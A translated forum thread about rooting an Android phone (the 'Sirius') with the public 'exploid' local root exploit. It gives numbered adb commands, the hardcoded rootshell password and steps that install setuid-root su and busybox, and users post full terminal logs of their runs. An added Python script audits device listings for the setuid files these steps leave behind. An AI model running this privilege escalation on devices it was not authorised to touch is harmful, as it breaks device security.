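Yesterday I managed to root the phone by modifying the firmware, but...
Today a new exploit was released, and since it can be applied to the Sirius, I'll explain using the new one.
It's really no different from the Droid rooting method, but since the Sirius has no cp, it differs slightly.
Also, this manual is only suitable for people who are proficient with adb.
1. Download the file from http://www.mediafire.com/?ow17z7kgf472xw9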
2. "adb push Superuser.apk /sdcard/Superuser.apk"
3. "adb push su /sdcard/su"
4. "adb push busybox /sdcard/busybox"
5. "adb push exploid /sqlite_stmt_journals/exploid"
6. "adb push busybox /sqlite_stmt_journals/busybox"
7. "adb shell"
8. "cd sqlite_stmt_journals"
9. "chmod 755 exploid"
10. "chmod 755 busybox"
11. Before the next step, set the phone up so that wifi can be turned on/off right away from Settings
12. "./exploid"
13. As soon as you run step 12, toggle wifi on/off (if it is on, turn it off and back on; if it is off, turn it on and back off.)
14. "rootshell"
15. Type "secretlol" as the password and you get a root shell
16. "./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk"
17. "./busybox cp /sdcard/su /system/bin/su"
18. "./busybox cp /sdcard/busybox /system/bin/busybox"
19. "chmod 4755 /system/bin/su"
20. "chmod 4755 /system/bin/busybox"
21. "rm /system/bin/rootshell"
Done!!!
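An added example, not part of the original post or thread: a Python check, written from the auditor's side, that reads saved `ls -l` output for /system/bin and /system/app and reports what steps 16-21 leave behind (setuid-root su and busybox, a remaining rootshell, Superuser.apk). The listing format, the sample lines and the function names are assumptions constructed for illustration.

```python
# Added example (not from the thread): audit saved `ls -l` output for the
# files the procedure above creates or marks setuid (mode 4755).
WATCHED = {"/system/bin/rootshell", "/system/app/Superuser.apk"}  # steps 16 and 21

def parse_line(line):
    """Return (mode, owner, name) for one `ls -l` line, or None if it is not an entry."""
    parts = line.split()
    if len(parts) < 4 or len(parts[0]) != 10 or parts[0][0] not in "-dlcbps":
        return None
    # For symlinks ("name -> target") the entry name sits before the arrow.
    name = parts[parts.index("->") - 1] if "->" in parts else parts[-1]
    return parts[0], parts[1], name

def audit(directory, listing, allow_setuid=()):
    """Return (path, reason) findings for one directory listing."""
    findings = []
    for line in listing.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        mode, owner, name = parsed
        path = directory.rstrip("/") + "/" + name
        # Character 3 of the mode string is 's' or 'S' when the setuid bit is set.
        if mode[0] == "-" and mode[3] in "sS" and owner == "root" \
                and path not in allow_setuid:
            findings.append((path, "setuid root"))
        if path in WATCHED:
            findings.append((path, "file named in the procedure"))
    return findings

# Constructed sample listing (not captured from a real device).
SAMPLE_BIN = """\
-rwxr-xr-x root     shell       82840 2010-07-01 09:00 toolbox
lrwxr-xr-x root     shell             2010-07-01 09:00 ls -> toolbox
-rwsr-xr-x root     root        26248 2010-08-20 10:11 su
-rwsr-xr-x root     root      1926944 2010-08-20 10:11 busybox
-rwsr-xr-x root     root         5000 2010-08-20 10:05 rootshell
"""

if __name__ == "__main__":
    for path, reason in audit("/system/bin", SAMPLE_BIN):
        print(f"{path}: {reason}")
```

Pass any setuid binaries known to ship with the stock image in `allow_setuid` so that only additions are reported.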
I think it failed on the first try and succeeded on the second... Where can I check that I have obtained root privileges?
C:\temp>adb push Superuser.apk /sdcard/Superuser.apk
576 KB/s (0 bytes in 27688.000s)
C:\temp>adb push su /sdcard/su
820 KB/s (0 bytes in 26248.000s)
C:\temp>adb push busybox /sdcard/busybox
4816 KB/s (0 bytes in 1926944.000s)
C:\temp>adb push exploid /sqlite_stmt_journals/exploid
744 KB/s (0 bytes in 11917.000s)
C:\temp>adb push busybox /sqlite_stmt_journals/busybox
4816 KB/s (0 bytes in 1926944.000s)
C:\temp>adb shell
$ cd sqlite_stmt_journals
cd sqlite_stmt_journals
$ chmod 755 exploid
chmod 755 exploid
$ chmod 755 busybox
chmod 755 busybox
$ ./exploid
./exploid
[*] Android local root exploid (C) The Android Exploid Crew
[*] Modified by birdman for the DroidX
[+] Using basedir=/sqlite_stmt_journals, path=/sqlite_stmt_journals/exploid
[+] opening NETLINK_KOBJECT_UEVENT socket
[+] sending add message ...
[*] Try to invoke hotplug now, clicking at the wireless
[*] settings, plugin USB key etc.
[*] You succeeded if you find /system/bin/rootshell.
[*] GUI might hang/restart meanwhile so be patient.
$ rootshell
rootshell
Password (echoed):secretlol
secretlol
# ./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
# ./busybox cp /sdcard/su /system/bin/su
./busybox cp /sdcard/su /system/bin/su
# ./busybox cp /sdcard/busybox /system/bin/busybox
./busybox cp /sdcard/busybox /system/bin/busybox
# chmod 4755 /system/bin/su
chmod 4755 /system/bin/su
# chmod 4755 /system/bin/busybox
chmod 4755 /system/bin/busybox
# rm /system/bin/rootshell
rm /system/bin/rootshell
#
After rebooting the phone, I can no longer get a root shell T_T;
*: When I open the Superuser permission app, I get the root shell again
Please give more detailed usage instructions
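When you run adb, if the prompt comes up as "$", it is a user shell,
and if it comes up as "#", it is a root shell.
The change to "#" after running the exploit happened because it turned into a root shell.
If you install su and superuser while in the root shell, then without running the exploit
you only need to type the "su" command when you are in the user shell showing "$".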
How do I install su and superuser;;; When I type the su command, this is what happens and it doesn't work.
C:\adb>adb push Superuser.apk /sdcard/Superuser.apk
failed to copy 'Superuser.apk' to '/sdcard/Superuser.apk': Permission denied
C:\adb>adb push Superuser.apk /sdcard/Superuser.apk
27 KB/s (0 bytes in 27688.001s)
C:\adb>adb push su /sdcard/su
25 KB/s (0 bytes in 26248.001s)
C:\adb>adb push busybox /sdcard/busybox
3884 KB/s (0 bytes in 1926944.000s)
C:\adb>adb push exploid /sqlite_stmt_journals/exploid
744 KB/s (0 bytes in 11917.000s)
C:\adb>adb push busybox /sqlite_stmt_journals/busybox
4152 KB/s (0 bytes in 1926944.000s)
C:\adb>adb shell
$ cd sqlite_stmt_journals
cd sqlite_stmt_journals
$ chmod 755 exploid
chmod 755 exploid
$ chmod 755 busybox
chmod 755 busybox
$ ./exploid
./exploid
[*] Android local root exploid (C) The Android Exploid Crew
[*] Modified by birdman for the DroidX
[+] Using basedir=/sqlite_stmt_journals, path=/sqlite_stmt_journals/exploid
[+] opening NETLINK_KOBJECT_UEVENT socket
[+] sending add message ...
[*] Try to invoke hotplug now, clicking at the wireless
[*] settings, plugin USB key etc.
[*] You succeeded if you find /system/bin/rootshell.
[*] GUI might hang/restart meanwhile so be patient.
$ rootshell
rootshell
Password (echoed):secretlol
secretlol
# ./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
./busybox cp /sdcard/Superuser.apk /system/app/Superuser.apk
# ./busybox cp /sdcard/su /system/bin/su
./busybox cp /sdcard/su /system/bin/su
# ./busybox cp /sdcard/busybox /system/bin/busybox
./busybox cp /sdcard/busybox /system/bin/busybox
# chmod 4755 /system/bin/su
chmod 4755 /system/bin/su
# chmod 4755 /system/bin/busybox
chmod 4755 /system/bin/busybox
# rm /system/bin/rootshell
rm /system/bin/rootshell
# su
su
[1] Illegal instruction su
# exit
exit
$ exit
exit
C:\adb>adb shell
$ su
su
[1] + Stopped (signal) su
$
Oh.. you posted it.. Thank you
I'll have to give it a try